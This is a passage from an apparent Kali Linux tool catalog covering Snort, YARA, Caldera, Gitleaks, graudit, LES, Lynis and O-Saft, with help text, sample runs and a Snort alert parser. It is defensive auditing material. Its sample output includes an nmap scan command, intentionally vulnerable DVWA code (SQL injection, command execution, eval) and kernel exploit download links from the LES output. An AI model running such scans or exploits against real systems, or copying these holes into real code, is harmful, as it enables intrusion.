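        print("rkhunter:", *finding)
```

Keep the allow-list narrow (the process path, not just "SNIFFER") and under version control, so that a new sniffer on the same interface still surfaces and the reasoning behind each suppression is reviewable.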
Snort
A network intrusion detection system. It detects packets that match rules describing malicious network activity and generates alerts.
■ Usage
root@kali:~# snort --help-options
-? <option prefix> output matching command line option quick help (same as --help-options) (optional)
-A <mode> set alert mode: none, cmg, or alert_*
-B <mask> obfuscated IP addresses in alerts and packet dumps using CIDR mask
-C print out payloads with character data only (no hex)
-c <conf> use this configuration
-D run Snort in background (daemon) mode
-d dump the Application Layer
-e display the second layer header info
-f turn off fflush() calls after binary log writes
-G <0xid> (same as --logid) (0:65535)
-g <gname> run snort gid as <gname> group (or gid) after initialization
-H make hash tables deterministic
-h show help overview (same as --help)
-i <iface>... list of interfaces
-k <mode> checksum mode; default is all (all|noip|notcp|noudp|noicmp|none)
-L <mode> logging mode (none, dump, pcap, or log_*)
-l <logdir> log to this directory instead of current directory
-M log messages to syslog (not alerts)
-m <umask> set the process file mode creation mask (0x000:0x1FF)
-n <count> stop after count packets (0:max53)
-O obfuscate the logged IP addresses
-Q enable inline mode operation
-q quiet mode - suppress normal logging on stdout
-R <rules> include this rules file in the default policy
-r <pcap>... (same as --pcap-list)
-s <snap> (same as --snaplen); default is 1518 (0:65535)
-T test and report on the current Snort configuration
-t <dir> chroots process to <dir> after initialization
-U use UTC for timestamps
-u <uname> run snort as <uname> or <uid> after initialization
-V (same as --version)
-v be verbose
-X dump the raw packet data starting at the link layer
-x same as --pedantic
-y include year in timestamp in the alert and log files
-z <count> maximum number of packet threads (same as --max-packet-threads); 0 gets the number of CPU cores reported by the system; default is 1 (0:max32)
--alert-before-pass evaluate alert rules before pass rules; default is pass rules first
--bpf <filter options> are standard BPF options, as seen in TCPDump
--c2x output hex for given char (see also --x2c)
--create-pidfile create PID file, even when not in Daemon mode
--daq <type> select packet acquisition module (default is pcap)
--daq-batch-size <size> set the DAQ receive batch size; default is 64 (1:)
--daq-dir <dir> tell snort where to find desired DAQ
--daq-list list packet acquisition modules available in optional dir, default is static modules only
--daq-mode <mode> select DAQ module operating mode (overrides automatic selection) (passive | inline | read-file)
--daq-var <name=value> specify extra DAQ configuration variable
--dirty-pig don't flush packets on shutdown
--dump-builtin-options additional options to include with --dump-builtin-rules stubs
--dump-builtin-rules [<module prefix>] output stub rules for selected modules (optional)
--dump-config dump config in json format (all | top)
--dump-config-text dump config in text format
--dump-dynamic-rules output stub rules for all loaded rules libraries
--dump-defaults [<module prefix>] output module defaults in Lua format (optional)
--dump-rule-deps dump rule dependencies in json format for use by other tools
--dump-rule-meta dump configured rule info in json format for use by other tools
--dump-rule-state dump configured rule state in json format for use by other tools
--dump-version output the version, the whole version, and only the version
--enable-inline-test enable Inline-Test Mode Operation
--enable-test-features enable features used in testing
--gen-msg-map dump configured rules in gen-msg.map format for use by other tools
--help show help overview
--help-commands [<module prefix>] output matching commands (optional)
--help-config [<module prefix>] output matching config options (optional)
--help-counts [<module prefix>] output matching peg counts (optional)
--help-limits print the int upper bounds denoted by max*
--help-module <module> output description of given module
--help-modules list all available modules with brief help
--help-modules-json dump description of all available modules in JSON format
--help-options [<option prefix>] output matching command line option quick help (same as -?) (optional)
--help-plugins list all available plugins with brief help
--help-signals dump available control signals
--id-offset offset to add to instance IDs when logging to files (0:65535)
--id-subdir create/use instance subdirectories in logdir instead of instance filename prefix
--id-zero use id prefix / subdirectory even with one packet thread
--include-path <path> where to find Lua and rule included files; searched before current or config directories
--list-buffers output available inspection buffers
--list-builtin [<module prefix>] output matching builtin rules (optional)
--list-gids [<module prefix>] output matching generators (optional)
--list-modules [<module type>] list all known modules of given type (optional)
--list-plugins list all known plugins
--lua <chunk> extend/override conf with chunk; may be repeated
--lua-sandbox <file> file that contains the lua sandbox environment in which config will be loaded
--logid <0xid> log Identifier to uniquely id events for multiple snorts (same as -G) (0:65535)
--markup output help in asciidoc compatible format
--max-packet-threads <count> configure maximum number of packet threads (same as -z) (0:max32)
--mem-check like -T but also compile search engines
--metadata-filter <filter> load only rules containing filter string in metadata if set
--nostamps don't include timestamps in log file names
--nolock-pidfile do not try to lock Snort PID file
--no-warn-flowbits ignore warnings about flowbits that are checked but not set and vice-versa
--no-warn-rules ignore warnings about duplicate rules and rule parsing issues
--pause wait for resume/quit command before processing packets/terminating
--pcap-file <file> file that contains a list of pcaps to read - read mode is implied
--pcap-list <list> a space separated list of pcaps to read - read mode is implied
--pcap-dir <dir> a directory to recurse to look for pcaps - read mode is implied
--pcap-filter <filter> filter to apply when getting pcaps from file or directory
--pcap-loop <count> read all pcaps <count> times; 0 will read until Snort is terminated (0:max32)
--pcap-no-filter reset to use no filter when getting pcaps from file or directory
--pcap-show print a line saying what pcap is currently being read
--pedantic warnings are fatal
--plugin-path <path> a colon separated list of directories or plugin libraries
--process-all-events process all action groups
--rule <rules> to be added to configuration; may be repeated
--rule-path <path> where to find rules files
--rule-to-hex output so rule header to stdout for text rule on stdin
--rule-to-text output plain so rule header to stdout for text rule on stdin (specify delimiter or [Snort_SO_Rule] will be used) (16)
--run-prefix <pfx> prepend this to each output file
--script-path <path> to a luajit script or directory containing luajit scripts
--show-file-codes indicate how files are located: A=absolute and W, F, C which are relative to the working directory, including file, and config file respectively
--show-plugins list module and plugin versions
--skip <n> skip 1st n packets (0:max53)
--snaplen <snap> set snaplen of packet (same as -s) (0:65535)
--stdin-rules read rules from stdin until EOF or a line starting with END is read
--talos enable Talos tweak (same as --tweaks talos)
--tweaks tune configuration
--version show version number (same as -V)
--warn-all enable all warnings
--warn-conf warn about configuration issues
--warn-conf-strict warn about unrecognized elements in configuration files
--warn-daq warn about DAQ issues, usually related to mode
--warn-flowbits warn about flowbits that are checked but not set and vice-versa
--warn-hosts warn about host table issues
--warn-plugins warn about issues that prevent plugins from loading
--warn-rules warn about duplicate rules and rule parsing issues
--warn-scripts warn about issues discovered while processing Lua scripts
--warn-symbols warn about unknown symbols in your Lua config
--warn-vars warn about variable definition and usage issues
--x2c output ASCII char for given hex (see also --c2x) (0x00:0xFF)
--x2s output ASCII string for given byte code (see also --x2c)
■ Example
# Create a rule that detects an XMAS scan
root@kali_1:~# echo "alert tcp \$EXTERNAL_NET any -> \$HOME_NET any (msg:\"SCAN nmap XMAS\"; flow:stateless; flags:UPF; classtype:attempted-recon; sid:1000001; rev:1;)" > scan.rules
# Start Snort on host 1
root@kali_1:~# snort -c /etc/snort/snort.lua -i eth0 -A alert_fast -R scan.rules
Loading /etc/snort/snort.lua:
Loading snort_defaults.lua:
Finished snort_defaults.lua:
[...]
pcap DAQ configured to passive.
Commencing packet processing
++ [0] eth0
# Run an XMAS scan against host 1
root@kali_2:~# nmap -sX 192.168.11.3
# The alerts are displayed
root@kali_1:~# snort -c /etc/snort/snort.lua -i eth0 -A alert_fast -R scan.rules
++ [0] eth0
11/15-11:43:09.192994 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46428 -> 192.168.11.3:993
11/15-11:43:09.193109 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46428 -> 192.168.11.3:139
11/15-11:43:09.193141 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46428 -> 192.168.11.3:3389
11/15-11:43:09.193170 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46428 -> 192.168.11.3:25
11/15-11:43:09.193198 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46428 -> 192.168.11.3:23
[...]
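With -A alert_fast every alert is a single line, which makes the output easy to post-process. The Python below is an added example, not part of Snort or of the original post: it parses alert_fast lines and groups them by rule, source and destination, so a port scan like the one above appears as one source touching many destination ports instead of dozens of separate alerts. The sample log is the five alerts shown above plus one constructed single-port alert from a second source, which the grouping leaves out at the default threshold.

```python
import re
from collections import defaultdict

# Added example: parse Snort "alert_fast" lines like the ones above and group them
# by rule and source so a scan shows up as one source hitting many destination ports.
ALERT_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+\"(?P<msg>[^\"]*)\"\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s*(?P<cls>[^\]]*)\]\s+)?"
    r"\[Priority:\s*(?P<prio>\d+)\]\s+\{(?P<proto>\w+)\}\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Constructed sample: the five alerts shown above plus one unrelated single-port hit.
SAMPLE_LOG = """\
11/15-11:43:09.192994 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46428 -> 192.168.11.3:993
11/15-11:43:09.193109 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46428 -> 192.168.11.3:139
11/15-11:43:09.193141 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46428 -> 192.168.11.3:3389
11/15-11:43:09.193170 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46428 -> 192.168.11.3:25
11/15-11:43:09.193198 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46428 -> 192.168.11.3:23
11/15-11:44:02.000123 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.9:51000 -> 192.168.11.3:80
"""


def parse_alerts(lines):
    """Yield one dict per well-formed alert_fast line; malformed lines are skipped."""
    for line in lines:
        m = ALERT_RE.match(line.strip())
        if not m:
            continue
        alert = m.groupdict()
        for key in ("gid", "sid", "rev", "prio", "sport", "dport"):
            alert[key] = int(alert[key])
        yield alert


def summarize_scanners(alerts, min_ports=3):
    """Group alerts by (rule, src, dst); keep groups that touched >= min_ports distinct ports."""
    ports = defaultdict(set)
    hits = defaultdict(int)
    for a in alerts:
        key = (f"{a['gid']}:{a['sid']}:{a['rev']}", a["msg"], a["src"], a["dst"])
        ports[key].add(a["dport"])
        hits[key] += 1
    rows = [
        {"rule": k[0], "msg": k[1], "src": k[2], "dst": k[3],
         "alerts": hits[k], "distinct_ports": len(ports[k])}
        for k in ports if len(ports[k]) >= min_ports
    ]
    return sorted(rows, key=lambda r: (-r["distinct_ports"], r["src"]))


if __name__ == "__main__":
    for row in summarize_scanners(parse_alerts(SAMPLE_LOG.splitlines())):
        print(row)
```

The same grouping, fed from the alert file under the -l log directory on a timer, is the simplest way to turn a per-packet rule like the XMAS one above into a per-source finding that can be ticketed or fed to a firewall block-list.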
YARA
Identifies and classifies malware and potentially dangerous files using rules that define patterns in text or binary data.
■ Usage
root@kali:~# yara --help
Usage: yara [OPTION]... [NAMESPACE:]RULES_FILE... FILE | DIR | PID
--atom-quality-table=FILE path to a file with the atom quality table
-C, --compiled-rules load compiled rules
-c, --count print only number of matches
-E, --strict-escape warn on unknown escape sequences
-d, --define=VAR=VALUE define external variable
-q, --disable-console-logs disable printing console log messages
--fail-on-warnings fail on warnings
-f, --fast-scan fast matching mode
-h, --help show this help and exit
-i, --identifier=IDENTIFIER print only rules named IDENTIFIER
--max-process-memory-chunk=NUMBER set maximum chunk size while reading process memory (default=1073741824)
-l, --max-rules=NUMBER abort scanning after matching a NUMBER of rules
--max-strings-per-rule=NUMBER set maximum number of strings per rule (default=10000)
-x, --module-data=MODULE=FILE pass FILE's content as extra data to MODULE
-n, --negate print only not satisfied rules (negate)
-N, --no-follow-symlinks do not follow symlinks when scanning
-w, --no-warnings disable warnings
-m, --print-meta print metadata
-D, --print-module-data print module data
-M, --module-names show module names
-e, --print-namespace print rules' namespace
-S, --print-stats print rules' statistics
-s, --print-strings print matching strings
-L, --print-string-length print length of matched strings
-X, --print-xor-key print xor key and plaintext of matched strings
-g, --print-tags print tags
-r, --recursive recursively search directories
--scan-list scan files listed in FILE, one per line
-z, --skip-larger=NUMBER skip files larger than the given size when scanning a directory
-k, --stack-size=SLOTS set maximum stack size (default=16384)
-t, --tag=TAG print only rules tagged as TAG
-p, --threads=NUMBER use the specified NUMBER of threads to scan a directory
-a, --timeout=SECONDS abort scanning after the given number of SECONDS
-v, --version show version information
■ Example
For YARA usage examples, see our blog post.
Security Auditing
MITRE Caldera
Emulates MITRE ATT&CK TTPs on target hosts and networks to detect and analyse threats to the organisation. It consists of agents that execute the TTPs and a server that manages the agents; operations are carried out through the GUI.
■ Usage
root@kali:~# caldera --help
usage: Welcome to the system [-h] [-E ENVIRONMENT] [-l {DEBUG,INFO,WARNING,ERROR,CRITICAL}] [--fresh] [-P PLUGINS]
[--insecure]
options:
-h, --help show this help message and exit
-E ENVIRONMENT, --environment ENVIRONMENT
Select an env. file to use
-l {DEBUG,INFO,WARNING,ERROR,CRITICAL}, --log {DEBUG,INFO,WARNING,ERROR,CRITICAL}
Set the logging level
--fresh remove object_store on start
-P PLUGINS, --plugins PLUGINS
Start up with a single plugin
--insecure Start caldera with insecure default config values. Equivalent to "-E default".
■ Example
root@kali:~# caldera
2024-09-19 05:53:28 - INFO (server.py:125 <module>) Using main config from conf/local.yml
2024-09-19 05:53:29 - INFO (contact_gist.py:70 start) Invalid Github Gist personal API token provided. Gist C2 contact will not be started.
2024-09-19 05:53:29 - INFO (tunnel_ssh.py:26 start) Generating temporary SSH private key. Was unable to use provided SSH private key
2024-09-19 05:53:29 - INFO (app_svc.py:116 load) Enabled plugin: training
2024-09-19 05:53:29 - INFO (app_svc.py:116 load) Enabled plugin: access
2024-09-19 05:53:29 - INFO (app_svc.py:116 load) Enabled plugin: response
2024-09-19 05:53:29 - INFO (app_svc.py:116 load) Enabled plugin: fieldmanual
2024-09-19 05:53:29 - INFO (app_svc.py:116 load) Enabled plugin: manx
2024-09-19 05:53:29 - INFO (app_svc.py:116 load) Enabled plugin: stockpile
2024-09-19 05:53:30 - INFO (app_svc.py:116 load) Enabled plugin: sandcat
2024-09-19 05:53:30 - INFO (app_svc.py:116 load) Enabled plugin: compass
2024-09-19 05:53:30 - INFO (app_svc.py:116 load) Enabled plugin: atomic
2024-09-19 05:53:30 - INFO (app_svc.py:116 load) Enabled plugin: debrief
2024-09-19 05:53:30 - INFO (logging.py:102 log) Creating SSH listener on 0.0.0.0, port 8022
2024-09-19 05:53:30 - INFO (server.py:751 start) serving on 0.0.0.0:2222
[...]
List of built-in ATT&CK tactics/techniques that the agent can execute
List of built-in profiles that group ATT&CK tactics/techniques by theme
Result of selecting and running a profile
DefectDojo
Integrates security tools across the entire software development lifecycle and continuously manages application risk by correlating and prioritizing security findings from multiple sources.
■ Usage
Please see the official guide.
■ Usage example
For a DefectDojo usage example, please see our blog post.
Gitleaks
Detects credentials such as passwords and API keys hard-coded in source code.
■ Usage
root@kali:~# gitleaks --help
Usage:
gitleaks [command]
Available Commands:
completion Generate the autocompletion script for the specified shell
detect detect secrets in code
help Help about any command
protect protect secrets in code
version display gitleaks version
Flags:
-b, --baseline-path string path to baseline with issues that can be ignored
-c, --config string config file path
order of precedence:
1. --config/-c
2. env var GITLEAKS_CONFIG
3. (--source/-s)/.gitleaks.toml
If none of the three options are used, then gitleaks will use the default config
--exit-code int exit code when leaks have been encountered (default 1)
-h, --help help for gitleaks
-l, --log-level string log level (trace, debug, info, warn, error, fatal) (default "info")
--max-target-megabytes int files larger than this will be skipped
--no-banner suppress banner
--redact redact secrets from logs and stdout
-f, --report-format string output format (json, csv, sarif) (default "json")
-r, --report-path string report file
-s, --source string path to source (default: $PWD) (default ".")
-v, --verbose show verbose output from scan
■ Usage
root@kali:~# gitleaks --help
Gitleaks scans code, past or present, for secrets
Usage:
gitleaks [command]
Available Commands:
completion generate the autocompletion script for the specified shell
dir scan directories or files for secrets
git scan git repositories for secrets
help Help about any command
stdin detect secrets from stdin
version display gitleaks version
Flags:
-b, --baseline-path string path to baseline with issues that can be ignored
-c, --config string config file path
order of precedence:
1. --config/-c
2. env var GITLEAKS_CONFIG
3. (target path)/.gitleaks.toml
If none of the three options are used, then gitleaks will use the default config
--enable-rule strings only enable specific rules by id
--exit-code int exit code when leaks have been encountered (default 1)
-i, --gitleaks-ignore-path string path to .gitleaksignore file or folder containing one (default ".")
-h, --help help for gitleaks
--ignore-gitleaks-allow ignore gitleaks:allow comments
-l, --log-level string log level (trace, debug, info, warn, error, fatal) (default "info")
--max-decode-depth int allow recursive decoding up to this depth (default "0", no decoding is done)
--max-target-megabytes int files larger than this will be skipped
--no-banner suppress banner
--no-color turn off color for verbose output
--redact uint[=100] redact secrets from logs and stdout. To redact only parts of the secret just apply a percent value from 0..100. For example --redact=20 (default 100%)
-f, --report-format string output format (json, csv, junit, sarif) (default "json")
-r, --report-path string report file
-v, --verbose show verbose output from scan
--version version for gitleaks
■ Usage example
root@kali:~# gitleaks -v --enable-rule generic-api-key dir
[...]
Finding: 'authentication_key' => 'abcxyzABCXYZ123098'
Secret: abcxyzABCXYZ123098
RuleID: generic-api-key
Entropy: 4.169925
File: tests/Eccube/Tests/Web/Admin/Store/PluginControllerTest.php
Line: 36
Fingerprint: tests/Eccube/Tests/Web/Admin/Store/PluginControllerTest.php:generic-api-key:36
4:05AM INF scan completed in 2.4s
4:05AM WRN leaks found: 1
graudit
Performs static analysis of source code to find potential vulnerabilities. Supports languages including C, Go, Java, JavaScript, Perl, PHP, Ruby, Scala, SQL and TypeScript.
■ Usage
root@kali:~# graudit -h
Usage: graudit [opts] /path/to/scan
OPTIONS
-d <dbname> database to use or /path/to/file.db (uses default if not specified)
-A scan unwanted and difficult (ALL) files
-x exclude these files (comma separated list: -x *.js,*.sql)
-i case in-sensitive scan
-c <num> number of lines of context to display, default is 2
-B supress banner
-L vim friendly lines
-b colour blind friendly template
-z supress colors
-Z high contrast colors
-l lists databases available
-v prints version number
-h prints this help screen
■ Usage example
root@kali:~# graudit -x *.js .
./csrf/test_credentials.php-20-
./csrf/test_credentials.php:21: $query = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
./csrf/test_credentials.php:22: $result = @mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>'. mysqli_connect_error() . '.<br />Try <a href="setup.php">installing again</a>.</pre>' );
./csrf/test_credentials.php-23- if( $result && mysqli_num_rows( $result ) == 1 ) { // Login Successful...
##############################################
./csrf/source/medium.php-17- $current_user = dvwaCurrentUser();
./csrf/source/medium.php:18: $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . $current_user . "';";
./csrf/source/medium.php:19: $result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
[...]
./exec/source/impossible.php-25- // *nix
./exec/source/impossible.php:26: $cmd = shell_exec( 'ping -c 4 ' . $target );
./exec/source/impossible.php-27- }
##############################################
./view_help.php-19- if ($locale == 'en') {
./view_help.php:20: eval( '?>' . file_get_contents( DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/{$id}/help/help.php" ) . '<?php ' );
./view_help.php-21- } else {
./view_help.php:22: eval( '?>' . file_get_contents( DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/{$id}/help/help.{$locale}.php" ) . '<?php ' );
./view_help.php-23- }
##############################################
LES (Linux privilege escalation auditing tool)
Provides information on known vulnerabilities for the Linux kernel version in use and verifies security settings.
■ Usage example
root@kali:~# ./linux-exploit-suggester.sh
Available information:
Kernel version: 5.15.167.4
Architecture: x86_64
Distribution: N/A
Distribution version: N/A
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: N/A
Searching among:
81 kernel space exploits
0 user space exploits
Possible Exploits:
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-0847] DirtyPipe
Details: https://dirtypipe.cm4all.com/
Exposure: less probable
Tags: ubuntu=(20.04|21.04),debian=11
Download URL: https://haxx.in/files/dirtypipez.c
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
root@kali:~# ./linux-exploit-suggester.sh --checksec
Mainline kernel protection mechanisms:
[ Disabled ] Kernel Page Table Isolation (PTI) support
https://github.com/mzet-/les-res/blob/master/features/pti.md
[ Enabled ] GCC stack protector support (CONFIG_HAVE_STACKPROTECTOR)
https://github.com/mzet-/les-res/blob/master/features/stackprotector-regular.md
[ Enabled ] GCC stack protector STRONG support (CONFIG_STACKPROTECTOR_STRONG)
https://github.com/mzet-/les-res/blob/master/features/stackprotector-strong.md
[ Enabled ] Low address space to protect from user allocation (CONFIG_DEFAULT_MMAP_MIN_ADDR)
https://github.com/mzet-/les-res/blob/master/features/mmap_min_addr.md
[ Disabled ] Prevent users from using ptrace to examine the memory and state of their processes (CONFIG_SECURITY_YAMA)
https://github.com/mzet-/les-res/blob/master/features/yama_ptrace_scope.md
[ Disabled ] Restrict unprivileged access to kernel syslog (CONFIG_SECURITY_DMESG_RESTRICT)
https://github.com/mzet-/les-res/blob/master/features/dmesg_restrict.md
[ Enabled ] Randomize the address of the kernel image (KASLR) (CONFIG_RANDOMIZE_BASE)
https://github.com/mzet-/les-res/blob/master/features/kaslr.md
[...]
Lynis
Performs a security scan of Linux, macOS and UNIX-based systems and reports information such as vulnerable software packages, possible configuration issues and hints for hardening the system.
■ Usage
root@kali:~# lynis --help
Usage: lynis command [options]
Command:
audit
audit system : Perform local security scan
audit system remote <host> : Remote security scan
audit dockerfile <file> : Analyze Dockerfile
show
show : Show all commands
show version : Show Lynis version
show help : Show help
update
update info : Show update details
Options:
Alternative system audit modes
--forensics : Perform forensics on a running or mounted system
--pentest : Non-privileged, show points of interest for pentesting
Layout options
--no-colors : Don't use colors in output
--quiet (-q) : No output
--reverse-colors : Optimize color display for light backgrounds
--reverse-colours : Optimize colour display for light backgrounds
Misc options
--debug : Debug logging to screen
--no-log : Don't create a log file
--profile <profile> : Scan the system with the given profile file
--view-manpage (--man) : View man page
--verbose : Show more details on screen
--version (-V) : Display version number and quit
--wait : Wait between a set of tests
--slow-warning <seconds> : Threshold for slow test warning in seconds (default 10)
Enterprise options
--plugindir <path> : Define path of available plugins
--upload : Upload data to central node
■ Usage example
root@kali:~# lynis audit system
[+] Initializing program
------------------------------------
- Detecting OS... [ DONE ]
- Checking profiles... [ DONE ]
[...]
-[ Lynis 3.1.1 Results ]-
Warnings (8):
----------------------------
! Reboot of system is most likely needed [KRNL-5830]
- Solution : reboot
https://cisofy.com/lynis/controls/KRNL-5830/
! Couldn't find 2 responsive nameservers [NETW-2705]
https://cisofy.com/lynis/controls/NETW-2705/
! Found some information disclosure in SMTP banner (OS or software name) [MAIL-8818]
https://cisofy.com/lynis/controls/MAIL-8818/
! iptables module(s) loaded, but no rules active [FIRE-4512]
https://cisofy.com/lynis/controls/FIRE-4512/
! Found easy guessable SNMP community string [SNMP-3306]
https://cisofy.com/lynis/controls/SNMP-3306/
[...]
Suggestions (55):
----------------------------
* Set a password on GRUB boot loader to prevent altering boot configuration (e.g. boot in single user mode without password) [BOOT-5122]
- Related resources
* Website: https://cisofy.com/lynis/controls/BOOT-5122/
* Determine runlevel and services at startup [BOOT-5180]
- Related resources
* Website: https://cisofy.com/lynis/controls/BOOT-5180/
* If not required, consider explicit disabling of core dump in /etc/security/limits.conf file [KRNL-5820]
- Related resources
* Website: https://cisofy.com/lynis/controls/KRNL-5820/
[...]
OWASP O-Saft
Displays information about SSL certificates and tests SSL connections against a given list of ciphers and various SSL settings.
■ Usage
root@kali:~# o-saft --help=options
Options for all commands (general)
--dns
Do DNS lookups to map given hostname to IP, do a reverse lookup.
--no-dns
Do not make DNS lookups.
Note that the corresponding IP and reverse hostname may be missing
in some messages then.
--host=HOST
Specify HOST as target to be checked. Legacy option.
--port=PORT
Specify PORT of target to be used. Legacy option.
--host=HOST --port=PORT HOST:PORT HOST
When giving more than one HOST argument, the sequence of the given
HOST argument and the given --port=PORT and the given --host=HOST
options are important.
The rule how ports and hosts are mapped is as follows:
* HOST:PORT arguments are used as is (connection to HOST on PORT)
* only HOST is given, then previous specified PORT is used
Note that URLs are treated as HOST:PORT, if they contain a port.
Example:
o-saft.pl +cmd host-1 --port 23 host-2 host-3:42 host-4
will connect to:
* host-1:443
* host-2:23
* host-3:42
* host-4:23
--proxyhost=PROXYHOST --proxy=PROXYHOST:PROXYPORT
Make all connection to target using PROXYHOST.
Also possible is: --proxy=PROXYUSER:PROXYPASS@PROXYHOST:PROXYPORT
--proxyport=PROXYPORT
Make all connection to target using PROXYHOST:PROXYPORT.
--proxyuser=PROXYUSER
Specify username for proxy authentication.
--proxypass=PROXYPASS
Specify password for proxy authentication.
--starttls
Use 'STARTTLS' command to start a TLS connection via SMTP.
This option is a shortcut for --starttls=SMTP .
--starttls=SMTP
--starttls=PROT
Use 'STARTTLS' command to start a TLS connection via protocol.
'PROT' may be any of: 'SMTP', 'IMAP', 'IMAP2', 'POP3', 'FTPS',
'RDP', 'LDAP' or 'XMPP' .
For --starttls=SMTP see --dns-mx also to use MX records instead
of host
--starttls-delay=SEC
Number of seconds to wait before sending a packet, to slow down the
'STARTTLS' requests. Default is 0.
This may prevent blocking of requests by the target due to too much
or too fast connections.
Note: In this case there is an automatic suspension and retry with
a longer delay.
--cgi
--cgi-exec
Internal use for CGI mode only.
Options for SSL tool
--rc
Read RC-FILE if exists, from directory where program was found.
--no-rc
Do not read RC-FILE.
--exitcode
The exit status code will be greater 0, if any of following applies:
* any check returns 'no', except if 'no (<<...>>)'
* insecure protocols are available
* insecure ciphers are supported
* ciphers without PFS are supported, disable with --exitcode-cipher
In particular, the status code will be the total count of all these
checks. The status code will also be printed at end, like:
# EXIT 23
Parts of these checks can be diasabled, see --exitcode-* options
below.
Use --v or --exitcode-v to see details about the performed checks.
Functionality implemented experimental, may change in future.
--exitcode-v
Print information about performed checks.
--exitcode-quiet
Do not print status code at end, like '# EXIT 23'.
--exitcode-no-checks
Do not count checks with result 'no' for --exitcode .
--exitcode-no-low --exitcode-no-weak --exitcode-no-medium
Do not count LOW, WEAK or MEDIUM security ciphers for --exitcode .
--exitcode-no-ciphers
Do not count any ciphers for --exitcode .
--exitcode-no-pfs
Do not count ciphers without PFS for --exitcode .
--openssl-s_client --s_client
Use "openssl s_slient ..." call to retrieve more information from
the SSL connection. This is disabled by default on Windows because
of performance problems. Without this option (default on Windows !)
following information are missing:
compression, expansion, renegotiation, resumption,
selfsigned, verify, chain, protocols, DH parameters
See "Net::SSLinfo" for details.
If used together with --trace, s_client data will also be printed
in debug output of "Net::SSLinfo".
--no-openssl
Do not use external "openssl" tool to retrieve information. Use of
"openssl" is disabled by default on Windows.
Note that this results in some missing information, see above.
--openssl=TOOL
'TOOL' can be a path to openssl executable; default: openssl
--openssl-cnf=FILE --openssl-conf=FILE
'FILE' path of directory or full path of openssl.cnf
If set, environment variable OPENSSL_CONF will be set to given path
(or file) when "openssl(1)" is started. Please see openssl's man page
for details about specifying alternate openssl.cnf files.
--openssl-ciphers --force-openssl
Use openssl to check for supported ciphers; default: "IO::Socket(3pm)"
This option forces to use "openssl s_slient -connect CIPHER .." to
check if a cipher is supported by the remote target. This is useful
if the --lib=PATH option doesn't work (for example due to changes
of the API or other incompatibilities).
--exe-path=PATH
--exe=PATH
'PATH' is a full path where to find openssl.
--lib-path=PATH
--lib=PATH
'PATH' is a full path where to find libssl.so, libcrypto.so.
See HACKER's INFO below for a detailed description how it works.
--envlibvar=NAME
'NAME' is the name of a environment variable containing additional
paths for searching dynamic shared libraries.
Default is LD_LIBRARY_PATH.
Check your system for the proper name, for example:
DYLD_LIBRARY_PATH, LIBPATH, RPATH, SHLIB_PATH.
--ssl-error
The connection to a target may fail, or even block, due to various
reasons for example lost network at all, blocking at firewall, etc.
In particular when checking ciphers with +cipher , this may result
in long delays until results are printed.
Using this option stops trying to do more connections to the target
when --ssl-error-max=CNT consecutive errors occoured, or when the
total amount of errors increases --ssl-error-total=CNT.
